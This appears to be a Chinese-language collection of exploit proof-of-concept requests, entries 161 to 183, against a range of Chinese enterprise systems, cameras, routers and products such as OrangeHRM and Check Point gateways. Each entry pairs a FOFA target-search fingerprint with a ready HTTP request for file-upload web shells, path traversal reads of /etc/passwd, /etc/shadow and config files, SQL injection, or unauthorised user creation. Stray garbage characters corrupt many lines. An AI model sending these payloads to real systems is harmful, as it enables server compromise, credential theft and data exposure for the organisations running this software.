% K: x: g2 I9 s8 @, mAccept: */*" ?5 e; Y: n& C2 I! H
Accept-Language: en
* D; \- N. l( qAccept-Encoding: gzip
$ t( _& h9 p& K+ Q6 w2 {, C$ c. b! \

. y* I- P! L7 t( ?0 f4 s161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% n! |9 e9 L) S) s
FOFA:body="/KT_Css/qd_defaul.css"
. s% o2 M+ L/ Z; M8 S& e/ p$ n第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密. d) p! Z8 r, k
POST /Webservice.asmx HTTP/1.10 |" b9 n/ m) J6 q
Host: x.x.x.x: [# H6 X- i0 \9 b2 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36  a+ r& Z8 t) @+ U/ m8 r- `
Connection: close
4 J+ k: |9 B( V( U* yContent-Length: 445
0 I# m! V* |4 H; Q8 Y  f' B5 i" e$ lContent-Type: text/xml
4 [0 T8 B5 X5 ?* c1 g  j) _$ OAccept-Encoding: gzip
5 R5 c9 C$ R( j! U% X; A! Y: Y5 X7 V& v* v" N
<?xml version="1.0" encoding="utf-8"?>
* g" ^* [& A5 V! ]/ I<soap:Envelope xmlns:xsi=": F3 c" l. g+ V, O" G! g
http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"; `) J/ g2 @, _2 p2 y1 T1 ?7 y& I
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 p- c8 u0 g* j8 S" M- y: X
<soap:Body>7 {: `9 s: ]9 a5 ?
<UploadResume xmlns="http://tempuri.org/">) ]& s( Z/ S$ g. w' [
<ip>1</ip>
3 z# o8 e* \+ H/ n5 p( I<fileName>../../../../dizxdell.aspx</fileName>
& t- i& s/ F. e( k0 j  Y<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow># N  z5 C; f* W8 M" S3 e0 [
<tag>3</tag>2 G% q3 v- g# d
</UploadResume>
" c! K$ O3 z- }: G</soap:Body>
  x# G9 ]* t5 c5 {) g</soap:Envelope>) @! u8 x0 |$ \9 e  p" C' {
; s$ t! J9 J3 K4 E3 y
4 L+ c* @8 ~/ m# u: ?  p
http://x.x.x.x/dizxdell.aspx! q$ c' A" I6 p6 d/ P

* j# ]! J, ]3 k162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 M! U9 E$ z$ z& X# B& Q& P
FOFA: app="和丰山海-数字标牌"
0 X8 i& y# S" K" jPOST /QH.aspx HTTP/1.15 u& z% l$ A% [- A
Host: x.x.x.x3 Q: g  b% y2 ~) h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0  z: d0 t" |* g" i
Connection: close
/ H+ s1 y7 V9 E$ U" y9 tContent-Length: 583& @9 @/ @" J$ X0 H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey1 U$ Y! d/ b/ v  V+ q+ A
Accept-Encoding: gzip
2 t( y  a2 X6 I( x+ B$ ]- Q  }3 ^" I& ]% F+ a
------WebKitFormBoundaryeegvclmyurlotuey
+ ~+ X) [( z- i* |/ t) sContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
; s! T  [/ f& W& ?, \Content-Type: application/octet-stream9 G% P! o& I4 u- @( z. D

: c$ A+ ]5 a3 w, H<% response.write("ujidwqfuuqjalgkvrpqy") %>
8 u! j3 Z/ P! z* j------WebKitFormBoundaryeegvclmyurlotuey1 Q' H/ D) d! N! B7 x4 ?! L
Content-Disposition: form-data; name="action"" `$ X/ S6 J9 P$ ]

. l. {1 f: q. w* t6 Qupload& M7 q3 n/ ?. h' w* G8 {- i
------WebKitFormBoundaryeegvclmyurlotuey
; j& ^7 P0 G# M, f' {9 dContent-Disposition: form-data; name="responderId"
' F% c. C: B- ]" ?- o* i, A/ R$ t  @! u4 j. s7 c7 b: g2 s: l, u& _- ?
ResourceNewResponder
) C) V8 @$ y0 Q* j$ L$ M------WebKitFormBoundaryeegvclmyurlotuey1 E' w" @% a1 m' Y
Content-Disposition: form-data; name="remotePath"
4 n* o& V' F5 j/ Z
' c2 t$ D0 @& L+ w/opt/resources
. d. V2 k- e& l" ~  R------WebKitFormBoundaryeegvclmyurlotuey--
$ q. L0 u( l3 g# s  I4 x0 H
9 _- V: G" N0 |: I4 {8 v  K/ N: E0 x" ?3 C
http://x.x.x.x/opt/resources/kjuhitjgk.aspx- s: D# t- ~5 ]- s6 R: ]
$ z% k5 [& y9 b, w- Q9 M: l2 y% ?2 X
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
# d5 r8 v3 u7 r" SFOFA: icon_hash="-795291075"  S6 B7 b- E1 r: }; m# Q
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
; u: q- A5 I4 |. ^( t, AHost: x.x.x.x
4 r( c$ H* g' x" s. ~% gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36' M3 {' t/ R/ Z) z
Connection: close
" ]% h2 [' S# ?: ]Content-Length: 293
- F' U  y( i3 ~& CAccept: */*' A1 w. d4 y+ S
Accept-Encoding: gzip, deflate6 l) v! U) q& K! i
Accept-Language: zh-CN,zh;q=0.91 N8 x7 Q2 ?) Y/ M- Q* h
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod" U1 q( S7 `, J# ]5 g' R+ F4 l
7 X, _" l% Z# V; K* R2 ^$ V
------iiqvnofupvhdyrcoqyuujyetjvqgocod, U( V1 M# |& t6 H+ O: G* B0 A
Content-Disposition: form-data; name="name"
7 Z, N# v, |# M6 N# B3 q$ E- m
! D' Q# l5 S9 p2 p7 {1.php
7 W% T- \5 _: y# L, |2 A0 N  x------iiqvnofupvhdyrcoqyuujyetjvqgocod
4 F, Z! L1 D" E) t$ wContent-Disposition: form-data; name="upfile"; filename="1.php"
; i! B) s. n; O* g1 xContent-Type: image/jpeg( j% V. \6 c! N. y$ x( R

: N5 O/ Y% R  m7 |( T5 ^' j. n- xrvjhvbhwwuooyiioxega5 _" l0 p' Q4 d
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
: Y+ I. w3 V2 W/ E5 Z+ e2 i  F' d. A5 x, Y

. g& X8 Z$ o4 P* n164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
& F, q; o* M$ d5 {5 N5 ~FOFA: title="智慧综合管理平台登入"! c. Y( Y& |3 R2 U' X) J5 A6 m% e' J' `
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
% L5 V5 `- Q, c& I+ o, k! `& F& Y3 XHost: x.x.x.x
4 {3 A7 p* \8 g- fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0* a" j9 ^1 s3 f' F# D: y
Content-Length: 2884 w9 N- b) G" w$ t/ e+ J
Accept: application/json, text/javascript, */*; q=0.01
$ S6 H6 m* o. O4 B5 bAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,5 w' n/ x! ^( p" X% w
Connection: close
) a/ u( k! d7 U5 N( w& w) i0 HContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl  s- @) y" B5 S! B
X-Requested-With: XMLHttpRequest
+ x% b$ P5 B! J! o4 uAccept-Encoding: gzip
5 r; G( C% l4 z. L
/ F  x* c1 X& v; S; i8 R/ }------dqdaieopnozbkapjacdbdthlvtlyl7 t/ l$ _' |! I
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"7 p) J5 y3 T: s
Content-Type: image/jpeg$ ^4 p' {7 q# W# |+ G1 ^

8 l2 m4 @( h1 |, B<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
+ k: ~' f' J1 ]0 ]- z. U( C' w: `------dqdaieopnozbkapjacdbdthlvtlyl--. M8 g3 M  H0 [. ]
# i3 n, _) k% h& i

% A# l) C3 E3 }" t" y9 ahttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx* @# r% s1 Y8 g/ T; o
% j0 T+ w1 ~/ M* i! ]; ^1 K" X
165. OrangeHRM 3.3.3 SQL 注入1 i8 }% U# @9 A' _7 o
CVE-2024-36428+ p, Z- Z' S: K% y) k
FOFA: app="OrangeHRM-产品"
' q5 z2 k* ?$ ^. F2 `* iURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
- @. e# W( e! p2 K/ @
% K; F. c$ F" g$ \# f* k& g% [& j, j7 ]& i# @
166. 中成科信票务管理平台SeatMapHandler SQL注入5 `# A/ S3 F- H3 ~! O
FOFA:body="技术支持:北京中成科信科技发展有限公司"5 {/ c  K; P9 E* q% L7 F# Q" o7 i
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1% Z- D: |) C% {& Z! b
Host:4 P0 \6 _! m# |+ @: t8 Y: H
Pragma: no-cache
* n. L  v  e/ @* y5 wCache-Control: no-cache
9 m* n( Z  [9 yUpgrade-Insecure-Requests: 14 g2 K% E; V4 N! P7 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.364 n$ U& _7 t9 j& X7 `# U4 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, Q# k* z; ^2 Y
Accept-Encoding: gzip, deflate
$ A! W4 g! q# ~6 r" BAccept-Language: zh-CN,zh;q=0.9,en;q=0.8! X+ O3 o: [: w- Y5 e
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE% \1 \8 n# E2 u1 l( y, u$ s
Connection: close8 G7 k6 y+ ~3 {" x8 D
Content-Type: application/x-www-form-urlencoded
0 H& q) J* S! B" rContent-Length: 89
' _) V1 n9 V  m5 k$ ^2 }3 q
6 q% Q5 o# e. Q7 kMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
# Y% n2 I6 H2 D9 Q( N4 F! _6 v$ p* G! J! e% `7 ~- n* b

: u( s5 Z. D/ R( Q5 `$ B/ l167. 精益价值管理系统 DownLoad.aspx任意文件读取
5 X& D& ~; A  ?2 CFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"% F3 X$ E* t# i. S
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1) D1 m9 E5 y# ~! f0 _& H+ s; D8 z
Host:
  x2 C7 E! F/ y6 x' K5 W$ W  tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 l2 \- B. w- fContent-Type: application/x-www-form-urlencoded
" m+ m1 c1 j' P# ]3 x7 _Accept-Encoding: gzip, deflate
; g; r! K, F( X9 l1 B1 ~Accept: */*
' h1 b: F' z: y4 v" F& W8 c6 ?Connection: keep-alive
/ H0 C. c( \1 o  X1 a- P* g6 O) \; _. M. x  P4 M0 o' w

& @6 m. c. }2 D1 {& y  O168. 宏景EHR OutputCode 任意文件读取
$ V# s, U2 W4 A2 X. ^# EFOFA:app="HJSOFT-HCM"
! N# [, ]5 ]! V% T' FGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
- o, S! C; I& ]6 F7 bHost: your-ip0 }5 T/ e% ?% Z$ o5 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36+ L  N/ z/ g5 D! m) @! }/ m
Content-Type: application/x-www-form-urlencoded
3 X  J% O" R+ \7 KConnection: close7 {" g0 r+ ], V5 }5 m2 f

# ]* o2 ~8 T: V/ m) W$ k8 E2 w
2 _0 B4 L/ k: \4 l0 H. {: c* j
. N# P; v( B5 `( ?3 L169. 宏景EHR downlawbase SQL注入
. }7 c: C6 s1 l9 t- ]  \5 QFOFA:app="HJSOFT-HCM"( x+ D/ W$ g" ]1 M5 p! F* X2 J0 g# ]$ g
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.12 g8 O# H2 ]9 g# C$ G  U( [6 }1 F8 t" r
Host: your-ip+ \6 R+ t9 z9 k' x6 H2 l+ L( G5 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# s8 R' f. Q: j% m$ Q& l
Accept: */*' y. K- {7 q" ?0 N% ]5 v
Accept-Encoding: gzip, deflate
. R- ^- T; y4 _( E, @3 R7 WConnection: close
: E! g' X" U9 M- @4 }  e6 D# x
8 t$ B5 E2 m7 S: j$ T+ W/ }8 e/ |. @; N9 W+ C

# X2 i2 ?& d$ u3 C" `& j4 G170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 Q' X& n: W. ^# U  {, D7 ?
FOFA:body="/general/sys/hjaxmanage.js"4 X5 b& w( j  A
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
8 R5 ~5 Z4 S: l' [Host: balalanengliang
& |9 g! F8 i/ gUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
  j2 b" L; y2 P% HContent-Type: application/x-www-form-urlencoded. i2 n& s  C4 b5 Z7 B* ^$ F( O
* A7 W/ \9 z2 v* a% d
filename=../webapps/ROOT/WEB-INF/web.xml4 G2 }0 {2 a5 i) ^4 S* u7 _) c2 v* j; b
1 k1 r% q% D" U- u. o2 a

: }) V& u" k- Z& _171. 通天星CMSV6车载定位监控平台 SQL注入9 t' Q7 t, v; ~' C, |* d- Z
FOFA:body="/808gps/"
# K) a" r3 C/ i& x9 M( L$ IGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.15 E9 T: U0 J7 y0 Q/ F
Host: your-ip
- a) ~7 l/ O) K: _0 ]2 Z) ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0+ Y' G4 M. F) ?
Accept: */*
! F- F) k0 C- t! @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: j7 S, w' l( S& r) G# m7 E# ^Accept-Encoding: gzip, deflate
6 E9 e9 u& @' p* @, kConnection: close4 C7 \; r" S& [6 Q5 E5 t& o( d

2 z2 z) D" `7 O. y2 o" r
+ E  O# [! a( `& Z# }7 Y+ D& H7 J0 m# w+ |7 [8 w. m- D! T
172. DT-高清车牌识别摄像机任意文件读取
6 A. H2 n* k) f  L2 S# DFOFA:app="DT-高清车牌识别摄像机"" j9 C" T  S( u, |6 [" L! X) i
GET /../../../../etc/passwd HTTP/1.12 t" X% {* z  J2 K
Host: your-ip
" t  \8 |$ `* g9 ^! t- S3 T7 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 `; I* y5 |- }* O
Accept-Encoding: gzip, deflate5 H+ v, e: s% R  H
Accept: */*
8 r; l/ P9 B% UConnection: keep-alive; X8 h/ t1 p, a- m

" p) ?& U" l- i2 y* c
0 f0 D% _( ]3 _+ ?+ l, ]" o+ ~5 O) y, y( ?% g0 A' h( L. x& m9 n5 e
173. Check Point 安全网关任意文件读取) z9 n7 l1 |! r% e+ S7 @
CVE-2024-249199 C' k1 G6 \: b; R/ {
FOFA:app="Check_Point-SSL-Network-Extender"
- ]& G  m9 P3 R$ ^, ^6 W. ]! UPOST /clients/MyCRL HTTP/1.1
5 i" _# v4 ]% X) U% kHost: your-ip: ^0 }1 n. u) r# J) z& h4 T
Content-Type: application/x-www-form-urlencoded6 I! H8 e( ^) {, c+ z6 t  ^
( l) e9 r& g5 Y. w+ Z: s
aCSHELL/../../../../../../../etc/shadow
$ d( G/ y, Q5 b. @! S+ v2 M$ p2 f
# y, L7 m9 ~: l  y9 [& x+ b/ o2 m, }% c6 P" I
/ {& ]% S  ?. @  g7 R5 K& q5 ^
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 Z! ^5 Q, _& S5 e4 u3 a0 XFOFA:app="金和网络-金和OA"- `, c, s: e, X8 x0 F! F
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
) z; {9 H( U. R* Q5 kHost: your-ip  M2 m8 O% O5 i# |+ s, l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 h4 A- [  a2 F2 s$ O" f2 sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# _. \6 e* b5 n, u: F8 T+ oAccept-Encoding: gzip, deflate, br: _1 E; C+ \# g* V. ]
Accept-Language: zh-CN,zh;q=0.9
5 V/ T2 b: _, s5 b3 l9 ZConnection: close) X9 \  d4 |( e3 h
- S/ c9 i: c# n: ^7 i* U( o2 O/ V

; y7 ^# H5 }9 Q; Z
% h( I6 A- n  A( t, P175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入0 ~; N" j- ~. |% V3 g, S. v
FOFA:app="金和网络-金和OA"
# r! ?9 h( [* T* q0 y/ g/ PGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
! u6 g/ {# t, G% \3 F9 `Host:' p! g! Y/ M7 i8 n  X: r
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( W% o1 h. Z% S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& k' [3 m1 g, q+ I, Y* H/ [3 G! O/ uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* p3 A. m8 h$ h, Y9 @% cAccept-Encoding: gzip, deflate
2 t  ~/ f/ p( ~- b2 j( lConnection: close
- D; r1 `% c8 tUpgrade-Insecure-Requests: 14 J3 @/ l% L3 O- r. L
- Y! I; C9 S) y+ E% M

* u- j- q& w  a0 L/ h* G: a: U176. 电信网关配置管理系统 rewrite.php 文件上传
* [0 U. h% b7 nFOFA:body="img/login_bg3.png" && body="系统登录"- Y4 g% E0 Y* J7 M2 a
POST /manager/teletext/material/rewrite.php HTTP/1.1; W4 U- u5 d0 i# G
Host: your-ip
7 s. p( [8 w  a. G+ L3 e4 qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: l+ I  d7 ^% W! EContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT3 }! N" j" [- c3 P% w  l
Connection: close4 G8 s( Y) o* Z" T

% s6 H' l1 l& E' Q, u% H; I------WebKitFormBoundaryOKldnDPT* Q+ z! G/ a0 G5 T
Content-Disposition: form-data; name="tmp_name"; filename="test.php"4 N. H% {3 O/ N" e( s- ?
Content-Type: image/png, h+ a2 I9 b6 U+ G
- a8 [, a0 W! }6 `
<?php system("cat /etc/passwd");unlink(__FILE__);?>
4 H% b( f* W+ s% O------WebKitFormBoundaryOKldnDPT
; y$ t; a7 b+ E" h9 RContent-Disposition: form-data; name="uploadtime"1 t" u( N6 ]" U- h
! B% c: @8 j+ j& ^, w/ R- H+ h
' F* C. v: S& k: N, v& M% a
------WebKitFormBoundaryOKldnDPT--+ z  @; r  W& C# T3 M
8 n2 _1 x' b6 [6 u

7 s5 [0 ]. u7 ~6 L5 \3 J/ ]) v7 n, N' \4 v6 j3 Z! N
177. H3C路由器敏感信息泄露
* X) K2 U! G2 `5 R+ T5 N: H3 M9 C/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
% `# t7 W5 A- J$ b* b5 R& G/userLogin.asp/../actionpolicy_status/../M60.cfg3 I$ Z, q7 F+ ]- _  K/ q% ?
/userLogin.asp/../actionpolicy_status/../GR8300.cfg  ?  m3 _1 ^1 v" f
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
# m6 E- G& ]0 ~: w0 _4 z& u/userLogin.asp/../actionpolicy_status/../GR3200.cfg! N, T' x5 e% f" O$ r
/userLogin.asp/../actionpolicy_status/../GR2200.cfg' C. Q2 B2 U6 m7 C
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
2 e, S7 D  W/ S. T4 J/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
. j2 j8 \6 R2 V* [, t! v/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
# E' u+ u2 k" y# f0 \/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
$ V' r/ ]/ \/ A. B: N, F2 y# v/userLogin.asp/../actionpolicy_status/../ER5200.cfg* f, ]$ [4 ~4 o9 h* P7 A
/userLogin.asp/../actionpolicy_status/../ER5100.cfg9 R* v9 x3 L. j# C$ _0 ]
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
2 N7 H* O) \# h4 i: B: d4 A/userLogin.asp/../actionpolicy_status/../ER3260.cfg% a9 {# g" m6 d( v1 t' K
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg% V, U- Q% `2 L" [( T0 C: E
/userLogin.asp/../actionpolicy_status/../ER3200.cfg+ M' j% K  V+ D! D' ^. Y
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg! v& E4 I# }; r6 P% P8 J
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
$ l1 u# ~3 c( f  I! M# b, l/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg* x% H/ Z8 E0 o8 x5 S: v7 T
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
% l5 x7 d( ]0 q" I0 {+ ~/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
& t1 F; y" P' @4 P# @+ ?
8 m8 x; S8 c/ I0 W+ K: |) L
6 s6 P! }+ a3 h178. H3C校园网自助服务系统-flexfileupload-任意文件上传( z; y# Y+ x( X' |
FOFA:header="/selfservice"
4 _+ Z% ^5 y5 HPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1  R: o9 Z* Q$ ~) l' |
Host:
! [6 }8 c( t4 s. ^& L- E* S; z8 J! h/ ]# yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36' y' y2 J4 t) t( Q) [* P
Content-Length: 252
- x- u1 l* K  J2 O; Q# [Accept-Encoding: gzip, deflate
, D0 ]3 Q/ ]0 Y! I% b1 HConnection: close# [2 }: A# d( ^9 G9 u
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l! `) H: K$ n, T8 @% L) |
-----------------aqutkea7vvanpqy3rh2l
8 e1 U  T- t" `- k# O" q% iContent-Disposition: form-data; name="12234.txt"; filename="12234"0 M  w: N, W/ X: B/ d
Content-Type: application/octet-stream2 W( }) _( B# p2 O7 k& e
Content-Length: 255+ N9 a: x0 E8 ^/ O; [
3 [8 I1 X# X1 Q
122345 X# c/ P# _& q; C. P2 a
-----------------aqutkea7vvanpqy3rh2l--
7 T: U+ ^& d+ |( t: P' ^& v
  Z! d4 R- Z8 z+ S; x3 k1 @6 s0 g; [/ o
GET /imc/primepush/%2e%2e/flex/12234.txt0 a# x2 V+ B1 E. }

: p( g" o' E$ z# m, n- X1 t' H  I3 D" i# J. e' e
179. 建文工程管理系统存在任意文件读取- [& d; f# \' Z+ G; Q) h
POST /Common/DownLoad2.aspx HTTP/1.1
  ^3 L- p+ n1 j1 }Host: {{Hostname}}7 G# v( H6 Z1 P' w3 \
Content-Type: application/x-www-form-urlencoded% b) Q! S2 @  e$ U; ^8 F
User-Agent: Mozilla/5.0" U1 E, ~7 n( O/ u/ p, }, {
2 d1 r: F- ?6 f! Z' f
path=../log4net.config&Name=( \' B% e& Y1 k4 V6 I2 b

) N" f. m' _& |- Q) {6 {! z. N: M
180. 帮管客 CRM jiliyu SQL注入
# a9 K7 |' H- l0 hFOFA:app="帮管客-CRM"& b5 {3 x. m. I  L. T$ [
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
% S; t# _8 {4 ?3 U: |- k1 HHost: your-ip* g( S# U' N/ g  c$ E3 i, K! K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
4 {9 O8 H: L4 s' i, r  @* ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ l1 d+ k, {4 ^1 NAccept-Encoding: gzip, deflate$ Z" i8 ^7 [* P  Y- T  l" K
Accept-Language: zh-CN,zh;q=0.9
( D- m0 U6 S' m, P1 F  PConnection: close! }% c7 i1 F2 p' j
" g# }2 j$ k" h& P; l; I7 x6 E

! W4 I# M# ]5 ~6 e/ t$ t' \! C. l181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入9 b$ t' K$ @' I3 ^7 [3 ]/ I
FOFA:"PDCA/js/_publicCom.js". ~- l0 @: D" m, ~
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
! E6 }( m% G- H9 }* MHost: your-ip
  }3 D# ^2 V( z9 ~2 b$ h3 o: \' R6 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36! ~' @% q5 \% |1 c& t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 m9 d8 t7 t3 v' |
Accept-Encoding: gzip, deflate, br
0 q, ?0 m) n+ _0 t; eAccept-Language: zh-CN,zh;q=0.9
0 W% b3 H+ k) \* j' eConnection: close4 u9 s! c; ^) P  X' O
Content-Type: application/x-www-form-urlencoded
; U1 l2 B* k3 Y6 n- ^: b  |4 E) d6 T3 E/ S. \

% m, `( s$ I5 ~& Baction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
. i8 }0 G: S, ~4 U) H$ B: `% r. F. e3 s+ x5 O2 i2 f+ B
0 Y! H& [# q& K& r; ?
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建( o) E% K( T4 X! W" y! A; J
FOFA:"PDCA/js/_publicCom.js"
, J: O1 ], G% a. YPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
  o2 r3 V' w" V' BHost: your-ip
0 `; e: m' g; H( ^! K3 Y8 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36. y9 T2 ?$ R8 }4 L7 x- X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' d3 T2 @7 C- x% f
Accept-Encoding: gzip, deflate, br) u$ [  ]7 D) d, l" n2 o
Accept-Language: zh-CN,zh;q=0.9
. b3 M6 K; Z# p  R9 yConnection: close: J5 D! {9 s1 W$ \, N$ p1 K" J
Content-Type: application/x-www-form-urlencoded
" M- u6 f6 t% F
2 `) l2 u/ i) K+ n; A$ M) d9 v  {2 i, J# f$ ?8 y# e
username=test1234&pwd=test1234&savedays=1' ?6 x) Y8 C! _" T) Y/ P* [7 D
6 H: f% B# z! L+ B" b
/ z* V, P6 c: Q
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
( y' o2 U% C6 V* ^+ I. rFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
0 m; O2 U: J! k' WGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
) B1 ?5 m" B* a: t1 q) kHost: your-ip$ Y/ e, t& N4 a
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 o0 n( }* L: z3 }
Accept-Charset: utf-83 u6 q& r" d+ e% d+ r+ }% E/ ^
